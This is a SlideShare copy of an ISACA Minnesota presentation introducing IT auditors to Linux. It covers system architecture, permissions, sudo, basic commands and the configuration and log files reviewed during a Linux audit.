SlideShare a Scribd company logo

How to Audit Linux - Gene Kartavtsev, ISACA MN

G
Gene Kartavtsev

The presentation focuses on main differences between Linux and Windows Operation Systems. It explains basic system architecture, introduces the most important commands for IT audit and gives overall prospective of Linux systems audit. It is also an opportunity to interact with an auditor, who has a real-world experience as systems engineer and has a prospective of an audit process from both sides. Speakers: Gene Kartavtsev, CISA, PCIP, ISA

Technology
1 of 38
Download to read offline
HOW TO AUDIT LINUX A Practical and Easy Primer ISACA Presentation – Minnesota Chapter Gene Kartavtsev - CISA, PCIP December 12, 2017
AGENDA How do I audit Linux? About Linux What is Linux? Linux Architecture How does Linux do it? Linux Audit What is to audit in Linux?
ABOUT LINUX What is Linux?
QUIZ: IS LINUX • …an Operating System (OS)? • …free? • … more secure? • …a penguin? • …worth it? • …a Unix?
IS LINUX AN OPERATING SYSTEM?
IS LINUX FREE?
IS LINUX MORE SECURE?
IS LINUX A PENGUIN?
IS LINUX WORTH IT?
IS LINUX A UNIX?
LINUX FACTS • Linux is not an OS, but it is the kernel, GNU Linux is the OS and it comes in over 300 flavors. • Linux Kernel was written by a 21 year finish college student as a part of his hobby • Linux is 26 years old • Linux is running on all 500 of the TOP500 supercomputers in the world. • Android Operating System is based off of Linux • Oscar-winning visual effects of the Titanic by James Cameron came from machines with Linux and Avatar was completely developed in 3D Applications on Linux platform. • Linux is everywhere…
PLACES LINUX IS RUNNING USA • U.S. Department of Defense • U.S. Navy Submarine Fleet • U.S. Postal Service • U.S. Federal Courts • Traffic control of San Francisco • New York Stock Exchange • Amazon, Google, Wikipedia OTHER COUNTRIES • The City of Munich, Germany • French Parliament • State-Owned Industrial and Commercial Bank of China • Government of Mexico City • Czech Post • Russian, Switzerland Schools • German Universities
LINUX STANDARD BASE The Linux Standard Base (LSB) is a joint project by several Linux distributions under the organizational structure of the Linux Foundation to standardize the software system structure, including the file system hierarchy used in the Linux operating system.
LINUX PROS AND CONS PROS • Easy to install • It is free • It is stable • Intelligent architecture • Many distributions available • Security CONS • Not too “user friendly” • Does not have dedicated support • Might not support a hardware • Desktop applications might not be available • Learning curve is required
LINUX ARCHITECTURE How does Linux do it?
RUNLEVELS A runlevel is one of the modes that a Unix -based operating system will run in. Each runlevel has a certain number of services stopped or started, giving the user control over the behavior of the machine. Conventionally, seven runlevels exist, numbered from zero to six. Runlevel Mode Action 0 Halt Shuts down system 1 – “safe mode” Single-User Mode Does not configure network interfaces, start daemons, or allow non-root logins 2 -”often no used” Multi-User Mode Does not configure network interfaces or start daemons. 3 – “server” Multi-User Mode with Networking Starts the system normally. 4-”often no used” Undefined Not used/User-definable 5 – “desktop” X11 As runlevel 3 + display manager(X) – Desktop environment 6- “reboot” Reboot Reboots the system Init (short for initialization) is the program on Unix and Unix-like systems that spawns all other processes. It runs as a daemon and typically has PID 1 Example: init 6 - will reboot the machine
LINUX FILE SYSTEM Shareable Unshareable Static /usr /opt /etc /boot Variable /var/mail /var/spool/news /var/run /var/lock FHS - Filesystem Hierarchy Standard - defines the directory structure and directory contents in Linux distributions. It is maintained by the Linux Foundation. In the FHS, all files and directories appear under the root directory /
LINUX FILE SYSTEM Directory Description Windows equivalent / File structure root C: bin System command binaries (executables) and shells (command prompt). Used to bring the system up C:Windowssystem32 boot Files necessary to boot the system ntldr, ntdetect.com, boot.ini dev Files that communicate with hardware (device drivers) C:WindowsSystem32Drivers etc Etc[etera] - Critical system configuration files ( *.ini , registry) C:WindowsSystem32Drivers, regedit home Home directories for users C:Users lib Essential shared libraries and kernel modules *.dll, *.ocx files mnt Mount point for mounting a file system temporarily. It can be used for remotely located file system D:CDROM, server Map Network Drive opt Optional application software packages C:WindowsProgam Files"Program Name (Ex. Fonts) root Home directory for special user root (system administrator) C:UsersAdministrator sbin Essential system binaries only for root (system administrator) .msc, Microsoft Management Console tmp Temporary files %TEMP% usr User binaries, including programs , games, etc. C:Program files var Variable data . Ex. Email, print jobs, logs, etc.. %AppData%, %SystemRoot%, C:Windows Logs, C:WindowsSystem32config (Event Viewer files)
PERMISSIONS - rwx rwx rwx PERMISSION TYPES R-Read (4), W-Write (2), X-Execute (1) 0 – Nothing 1- x 2 – w 4 – r 3 – wx = 1+2 5 – rx = 4+1 6 – rw = 4+2 7 – rwx = 4+2+1 USERS & GROUPS [---] - Owner, [---] - Group, [---] - All users • owner - The Owner permissions apply only the owner of the file or directory, they will not impact the actions of other users. • group - The Group permissions apply only to the group that has been assigned to the file or directory, they will not effect the actions of other users. • all users - The All Users permissions apply to all other users on the system, this is the permission group that you want to watch the most. ls –lah lists folder content in long format. –l - long listing format, -a – all files, h - human-readable Example: ls –lah /home/user -rw------- 1 gene gene 2.4K Dec 10 22:03 .bash_history
WHO HAS PERMISSIONS TO DO WHAT? Example: rw-r--r--
ROOT AND SUDO ROOT (SU–SUPER[SWITCH] USER) • Has unlimited privileges • Has only one password • Can make a damage to the system without warning • Username is always known to bad guys • Has only super user role SUDO (SUPER USER DO) • Minimizes root privileges • Root password is not shared or used • Prompts for password for every major step • Easier “undo” as it logs every step • Easier admin role transfer • Authentication timeout su – switches to root account su user switches to a user account , -c command – will run a command as a user sudo command – prompts for user password and confirms a request to execute a command The sudo command makes it easier to practice the principle of least privilege
LINUX COMMANDS Task Linux Windows Information about system uname - a winver Current date and time date date /t , time /t Clear screen clear cls Compare files diff fc Find a string in a file grep find View a file less more Display location in a file system pwd chdir List files in a directory Ls -la dir Find IP ifconfig ipconfig See System information lscpu systeminfo See file system usage df -aTh Disk Manager, net use See running processes ps –ef tasklist See command description whatis <command> help See environmental variables env set See what user is logged in whoami whoami See network protocols in use netstat netstat
LINUX FUN • Killing Daemons • Avoiding Zombies • Fortune Telling • Finding Jokes • Saying “Thank you !”
LINUX AUDIT What is to audit in Linux?
LINUX – Know before the audit • Linux is not going out of business • Linux is an intelilgent Operating System • Linux follows standards • Linux administration is a culture • Linux audit can be easily automated
LINUX AUDIT CHALLENGES TOP 5 SYSADMIN’S COMPLAINTS ABOUT AUDIT • You're vague: Please do your homework before making request • You make urgent, last-minute requests: Please let me know about your request in advance • You waste your sysadmin's time: Please let me know about everything you need at once • You abuse your rights: Running an application as root isn't a fix • You take your sysadmin for granted: Not getting the slightest recognition when everything works, but being excessively blamed when something fails
LINUX AUDIT - “Secrets” • Develop a relationship with Linux admin before the audit • Establish credibility with Linux admin • Communicate the Audit process • Scope • Timeline • Deliverables • Be current • Don’t be afraid to be a geek
LINUX AUDIT OBJECTIVES • Authorized User Access • Authorized Services, Daemons, Modules • Authorized Networking/Connections • Authorized File Access • Appropriate Logging • Appropriate Security Parameters • Authorized Applications
LINUX AUDIT - What should we look at? /etc - Primary system configuration directory /home/$USER - User data and user configuration information /var/log - Security logs, application logs, etc.
LINUX AUDIT - Basic system profiling Linux distribution name and version /etc/*-release Computer name /etc/hostname IP Address(es) /etc/hosts /var/lib/dhclient
LINUX AUDIT - User accounts Basic user data /etc/passwd Group membership /etc/group Admin users /etc/sudoers /etc/passwd (UID 0 account has admin privileges)
LINUX AUDIT - User login history User, time, login durations /var/log/wtmp (use last command) Other logs /var/log/auth.log /var/log/sudo.log Commands last, lastlog, w, who
LINUX AUDIT – No place like $HOME User files /home/<user> /root Important user files $HOME/.* - (Hidden files/directories start with “.”) $HOME/.bash_history - commands history $HOME/.ssh – remote access information
LINUX AUDIT – Daemons, services Start-up scripts /etc/inittab, /etc/init.d, /etc/rc.d /etc/init.conf, /etc/init Scheduled tasks /etc/cron* /var/spool/cron/* Commands ps –ef, ps aux
RESOURCES TO LEARN LINUX GENERAL • LinuxCommand.org • The Linux System Administrator's Guide • GNU Operating System • More… 12 Resources to Learn Linux SECURITY AND AUDIT • SANS Pen Testing • LinuxSecurity.com • Linux-Audit.com • Linuxtopia.org
QUESTIONS?
ABOUT SPEAKER Gene Kartavtsev, CISA, PCIP Gene has 20 years of Information Technology experience, which includes IT audit, security, architecture, engineering and support. Prior to focusing on IT Governance, Risk and Compliance, Gene worked at several global financial services and Media companies, including Bloomberg L.P and Thomson Reuters, where he sharpened his skills in information systems engineering and architecture. He participated in thousands of complex IT implementations and was often involved in solving technology challenges vital to the success of the core business. In 2012 while working at JetBlue on a PCI controls implementation project, Gene discovered the interesting world of IT compliance. (Maybe insert something here about what you liked about IT compliance) Later, after moving from New York to Minnesota Gene followed his passion in IT Risk Management and Compliance and has held several roles that have required a combination of technical expertise and knowledge of the latest IT regulations. Gene has rounded out his practical knowledge with CISA, PCIP, and ISA certifications. Gene recently joined Express Scripts, where he enjoys working with the challenges of applying multiple IT regulatory standards to many areas of large company operations. Other interests include spending time with the family, traveling and bicycle randonneuring - a long- distance, unsupported, noncompetitive cycling within prescribed time limits. LinkedIn: https://www.linkedin.com/in/gkartavtsev Email: gkartavtsev@gmail.com
How to Audit Linux - Gene Kartavtsev, ISACA MN

Recommended

linux software architecture
linux software architecture linux software architecture
linux software architecture
Sneha Ramesh
 
Linux introduction, class 1
Linux introduction, class 1Linux introduction, class 1
Linux introduction, class 1
Adrian Mikeliunas
 
linux os-basics,Devops training in Hyderabad
linux os-basics,Devops training in Hyderabadlinux os-basics,Devops training in Hyderabad
linux os-basics,Devops training in Hyderabad
Devops Trainer
 
Operating Systems: Linux in Detail
Operating Systems: Linux in DetailOperating Systems: Linux in Detail
Operating Systems: Linux in Detail
Damian T. Gordon
 
Introduction 2 linux
Introduction 2 linuxIntroduction 2 linux
Introduction 2 linux
Papu Kumar
 
Operating Systems 1: Introduction
Operating Systems 1: IntroductionOperating Systems 1: Introduction
Operating Systems 1: Introduction
Damian T. Gordon
 
Introduction to linux
Introduction to linuxIntroduction to linux
Introduction to linux
Luis Terron
 
Introduction to linux
Introduction to linuxIntroduction to linux
Introduction to linux
plarsen67
 

Recommended

linux software architecture
linux software architecture linux software architecture
linux software architecture
Sneha Ramesh
 
Linux introduction, class 1
Linux introduction, class 1Linux introduction, class 1
Linux introduction, class 1
Adrian Mikeliunas
 
linux os-basics,Devops training in Hyderabad
linux os-basics,Devops training in Hyderabadlinux os-basics,Devops training in Hyderabad
linux os-basics,Devops training in Hyderabad
Devops Trainer
 
Operating Systems: Linux in Detail
Operating Systems: Linux in DetailOperating Systems: Linux in Detail
Operating Systems: Linux in Detail
Damian T. Gordon
 
Introduction 2 linux
Introduction 2 linuxIntroduction 2 linux
Introduction 2 linux
Papu Kumar
 
Operating Systems 1: Introduction
Operating Systems 1: IntroductionOperating Systems 1: Introduction
Operating Systems 1: Introduction
Damian T. Gordon
 
Introduction to linux
Introduction to linuxIntroduction to linux
Introduction to linux
Luis Terron
 
Introduction to linux
Introduction to linuxIntroduction to linux
Introduction to linux
plarsen67
 
Unix Security
Unix SecurityUnix Security
Unix Security
Kumar Setty, HCISPP, CISA, CCSK, ITIL, CHSP
 
Introduction to Linux basic
Introduction to Linux basicIntroduction to Linux basic
Introduction to Linux basic
f114n
 
Unix
UnixUnix
Unix
Erm78
 
UNIX and Linux - an introduction by Mathias Homann
UNIX and Linux - an introduction by Mathias HomannUNIX and Linux - an introduction by Mathias Homann
UNIX and Linux - an introduction by Mathias Homann
Mathias Homann
 
Advance linux presentation_0702011
Advance linux presentation_0702011Advance linux presentation_0702011
Advance linux presentation_0702011Aravindan Arun
 
Linux operating system
Linux operating systemLinux operating system
Linux operating system
ITz_1
 
Introduction to linux ppt
Introduction to linux pptIntroduction to linux ppt
Introduction to linux ppt
Omi Vichare
 
Linux command ppt
Linux command pptLinux command ppt
Linux command ppt
kalyanineve
 
Linux course details
Linux course detailsLinux course details
Linux course detailscisco training
 
Linux - Introductions to Linux Operating System
Linux - Introductions to Linux Operating SystemLinux - Introductions to Linux Operating System
Linux - Introductions to Linux Operating System
Vibrant Technologies & Computers
 
Unix Operating System
Unix Operating SystemUnix Operating System
Unix Operating System
subhsikha
 
ZendCon - Linux 101
ZendCon - Linux 101ZendCon - Linux 101
ZendCon - Linux 101
Justin Reock
 
Linux programming lecture_notes
Linux programming lecture_notesLinux programming lecture_notes
Linux programming lecture_notesIMRAN KHAN
 
Unix ppt
Unix pptUnix ppt
Unix ppt
Dr Rajiv Srivastava
 
Linux Operating System
Linux Operating SystemLinux Operating System
Linux Operating System
KunalKewat1
 
Linux seminar
Linux seminarLinux seminar
Linux seminarBuntha Chhay
 
comparing windows and linux ppt
comparing windows and linux pptcomparing windows and linux ppt
comparing windows and linux ppt
Shivalik college of engineering
 
An Introduction to Linux
An Introduction to LinuxAn Introduction to Linux
An Introduction to Linux
anandvaidya
 
Presentation1 linux os
Presentation1 linux osPresentation1 linux os
Presentation1 linux osjoycoronado
 
Introduction and history of linux
Introduction and history of linuxIntroduction and history of linux
Introduction and history of linux
SHUBHA CHATURVEDI
 
Linux: Everyting-as-a-service
Linux: Everyting-as-a-serviceLinux: Everyting-as-a-service
Linux: Everyting-as-a-service
Rohit Sansiya
 
Unix/Linux
Unix/Linux Unix/Linux
Unix/Linux
Saurabh Upadhyay
 

More Related Content

What's hot

Unix Security
Unix SecurityUnix Security
Unix Security
Kumar Setty, HCISPP, CISA, CCSK, ITIL, CHSP
 
Introduction to Linux basic
Introduction to Linux basicIntroduction to Linux basic
Introduction to Linux basic
f114n
 
Unix
UnixUnix
Unix
Erm78
 
UNIX and Linux - an introduction by Mathias Homann
UNIX and Linux - an introduction by Mathias HomannUNIX and Linux - an introduction by Mathias Homann
UNIX and Linux - an introduction by Mathias Homann
Mathias Homann
 
Advance linux presentation_0702011
Advance linux presentation_0702011Advance linux presentation_0702011
Advance linux presentation_0702011Aravindan Arun
 
Linux operating system
Linux operating systemLinux operating system
Linux operating system
ITz_1
 
Introduction to linux ppt
Introduction to linux pptIntroduction to linux ppt
Introduction to linux ppt
Omi Vichare
 
Linux command ppt
Linux command pptLinux command ppt
Linux command ppt
kalyanineve
 
Linux - Introductions to Linux Operating System
Linux - Introductions to Linux Operating SystemLinux - Introductions to Linux Operating System
Linux - Introductions to Linux Operating System
Vibrant Technologies & Computers
 
Unix Operating System
Unix Operating SystemUnix Operating System
Unix Operating System
subhsikha
 
ZendCon - Linux 101
ZendCon - Linux 101ZendCon - Linux 101
ZendCon - Linux 101
Justin Reock
 
Linux programming lecture_notes
Linux programming lecture_notesLinux programming lecture_notes
Linux programming lecture_notesIMRAN KHAN
 
Unix ppt
Unix pptUnix ppt
Unix ppt
Dr Rajiv Srivastava
 
Linux Operating System
Linux Operating SystemLinux Operating System
Linux Operating System
KunalKewat1
 
comparing windows and linux ppt
comparing windows and linux pptcomparing windows and linux ppt
comparing windows and linux ppt
Shivalik college of engineering
 
An Introduction to Linux
An Introduction to LinuxAn Introduction to Linux
An Introduction to Linux
anandvaidya
 
Presentation1 linux os
Presentation1 linux osPresentation1 linux os
Presentation1 linux osjoycoronado
 
Introduction and history of linux
Introduction and history of linuxIntroduction and history of linux
Introduction and history of linux
SHUBHA CHATURVEDI
 

What's hot (20)

Unix Security
Unix SecurityUnix Security
Unix Security
 
Introduction to Linux basic
Introduction to Linux basicIntroduction to Linux basic
Introduction to Linux basic
 
Unix
UnixUnix
Unix
 
UNIX and Linux - an introduction by Mathias Homann
UNIX and Linux - an introduction by Mathias HomannUNIX and Linux - an introduction by Mathias Homann
UNIX and Linux - an introduction by Mathias Homann
 
Advance linux presentation_0702011
Advance linux presentation_0702011Advance linux presentation_0702011
Advance linux presentation_0702011
 
Linux operating system
Linux operating systemLinux operating system
Linux operating system
 
Introduction to linux ppt
Introduction to linux pptIntroduction to linux ppt
Introduction to linux ppt
 
Linux command ppt
Linux command pptLinux command ppt
Linux command ppt
 
Linux course details
Linux course detailsLinux course details
Linux course details
 
Linux - Introductions to Linux Operating System
Linux - Introductions to Linux Operating SystemLinux - Introductions to Linux Operating System
Linux - Introductions to Linux Operating System
 
Unix Operating System
Unix Operating SystemUnix Operating System
Unix Operating System
 
ZendCon - Linux 101
ZendCon - Linux 101ZendCon - Linux 101
ZendCon - Linux 101
 
Linux programming lecture_notes
Linux programming lecture_notesLinux programming lecture_notes
Linux programming lecture_notes
 
Unix ppt
Unix pptUnix ppt
Unix ppt
 
Linux Operating System
Linux Operating SystemLinux Operating System
Linux Operating System
 
Linux seminar
Linux seminarLinux seminar
Linux seminar
 
comparing windows and linux ppt
comparing windows and linux pptcomparing windows and linux ppt
comparing windows and linux ppt
 
An Introduction to Linux
An Introduction to LinuxAn Introduction to Linux
An Introduction to Linux
 
Presentation1 linux os
Presentation1 linux osPresentation1 linux os
Presentation1 linux os
 
Introduction and history of linux
Introduction and history of linuxIntroduction and history of linux
Introduction and history of linux
 

Similar to How to Audit Linux - Gene Kartavtsev, ISACA MN

Linux: Everyting-as-a-service
Linux: Everyting-as-a-serviceLinux: Everyting-as-a-service
Linux: Everyting-as-a-service
Rohit Sansiya
 
Unix/Linux
Unix/Linux Unix/Linux
Unix/Linux
Saurabh Upadhyay
 
Linuxtraining 130710022121-phpapp01
Linuxtraining 130710022121-phpapp01Linuxtraining 130710022121-phpapp01
Linuxtraining 130710022121-phpapp01Chander Pandey
 
Basic orientation to Linux
Basic orientation to LinuxBasic orientation to Linux
Basic orientation to Linux
Vidyaratha Kissoon
 
Network and System Administration Power Point
Network and System Administration Power PointNetwork and System Administration Power Point
Network and System Administration Power Point
kemal678348
 
Linux administration classes in mumbai
Linux administration classes in mumbaiLinux administration classes in mumbai
Linux administration classes in mumbai
Vibrant Technologies & Computers
 
linux-lecture1.ppt
linux-lecture1.pptlinux-lecture1.ppt
linux-lecture1.ppt
jeronimored
 
Linux Basics Knowlage sharing.pptx
Linux Basics Knowlage sharing.pptxLinux Basics Knowlage sharing.pptx
Linux Basics Knowlage sharing.pptx
bemnitekalegn
 
Linux操作系统01 简介
Linux操作系统01 简介Linux操作系统01 简介
Linux操作系统01 简介lclsg123
 
Unix _linux_fundamentals_for_hpc-_b
Unix _linux_fundamentals_for_hpc-_bUnix _linux_fundamentals_for_hpc-_b
Unix _linux_fundamentals_for_hpc-_b
Mohammad Reza Beygi
 
Linux introduction (eng)
Linux introduction (eng)Linux introduction (eng)
Linux introduction (eng)
Anatoliy Okhotnikov
 
UNIX/Linux training
UNIX/Linux trainingUNIX/Linux training
UNIX/Linux training
Michael Olafusi
 
Linux Internals - Part I
Linux Internals - Part ILinux Internals - Part I
Linux Internals - Part I
Emertxe Information Technologies Pvt Ltd
 
12-introductiontolinuxos-190907073928
12-introductiontolinuxos-19090707392812-introductiontolinuxos-190907073928
12-introductiontolinuxos-190907073928
SahilNegi60
 
Online Training in Unix Linux Shell Scripting in Hyderabad
Online Training in Unix Linux Shell Scripting in HyderabadOnline Training in Unix Linux Shell Scripting in Hyderabad
Online Training in Unix Linux Shell Scripting in HyderabadRavikumar Nandigam
 
12 introduction to Linux OS
12 introduction to Linux OS12 introduction to Linux OS
12 introduction to Linux OS
Hameda Hurmat
 
unixoperatingsystem-130327073532-phpapp01.pdf
unixoperatingsystem-130327073532-phpapp01.pdfunixoperatingsystem-130327073532-phpapp01.pdf
unixoperatingsystem-130327073532-phpapp01.pdf
IxtiyorTeshaboyev
 
Spsl unit1
Spsl unit1Spsl unit1
Spsl unit1
Sasidhar Kothuru
 

Similar to How to Audit Linux - Gene Kartavtsev, ISACA MN (20)

Linux: Everyting-as-a-service
Linux: Everyting-as-a-serviceLinux: Everyting-as-a-service
Linux: Everyting-as-a-service
 
Unix/Linux
Unix/Linux Unix/Linux
Unix/Linux
 
Linuxtraining 130710022121-phpapp01
Linuxtraining 130710022121-phpapp01Linuxtraining 130710022121-phpapp01
Linuxtraining 130710022121-phpapp01
 
Basic orientation to Linux
Basic orientation to LinuxBasic orientation to Linux
Basic orientation to Linux
 
Network and System Administration Power Point
Network and System Administration Power PointNetwork and System Administration Power Point
Network and System Administration Power Point
 
Linux
Linux Linux
Linux
 
Linux administration classes in mumbai
Linux administration classes in mumbaiLinux administration classes in mumbai
Linux administration classes in mumbai
 
linux-lecture1.ppt
linux-lecture1.pptlinux-lecture1.ppt
linux-lecture1.ppt
 
Linux Basics Knowlage sharing.pptx
Linux Basics Knowlage sharing.pptxLinux Basics Knowlage sharing.pptx
Linux Basics Knowlage sharing.pptx
 
Linux操作系统01 简介
Linux操作系统01 简介Linux操作系统01 简介
Linux操作系统01 简介
 
Linux
LinuxLinux
Linux
 
Unix _linux_fundamentals_for_hpc-_b
Unix _linux_fundamentals_for_hpc-_bUnix _linux_fundamentals_for_hpc-_b
Unix _linux_fundamentals_for_hpc-_b
 
Linux introduction (eng)
Linux introduction (eng)Linux introduction (eng)
Linux introduction (eng)
 
UNIX/Linux training
UNIX/Linux trainingUNIX/Linux training
UNIX/Linux training
 
Linux Internals - Part I
Linux Internals - Part ILinux Internals - Part I
Linux Internals - Part I
 
12-introductiontolinuxos-190907073928
12-introductiontolinuxos-19090707392812-introductiontolinuxos-190907073928
12-introductiontolinuxos-190907073928
 
Online Training in Unix Linux Shell Scripting in Hyderabad
Online Training in Unix Linux Shell Scripting in HyderabadOnline Training in Unix Linux Shell Scripting in Hyderabad
Online Training in Unix Linux Shell Scripting in Hyderabad
 
12 introduction to Linux OS
12 introduction to Linux OS12 introduction to Linux OS
12 introduction to Linux OS
 
unixoperatingsystem-130327073532-phpapp01.pdf
unixoperatingsystem-130327073532-phpapp01.pdfunixoperatingsystem-130327073532-phpapp01.pdf
unixoperatingsystem-130327073532-phpapp01.pdf
 
Spsl unit1
Spsl unit1Spsl unit1
Spsl unit1
 

Recently uploaded

GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Paige Cruz
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.
ViralQR
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
Quantum Computing: Current Landscape and the Future Role of APIs
Quantum Computing: Current Landscape and the Future Role of APIsQuantum Computing: Current Landscape and the Future Role of APIs
Quantum Computing: Current Landscape and the Future Role of APIs
Vlad Stirbu
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
Pierluigi Pugliese
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 

Recently uploaded (20)

GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfObservability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
 
Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
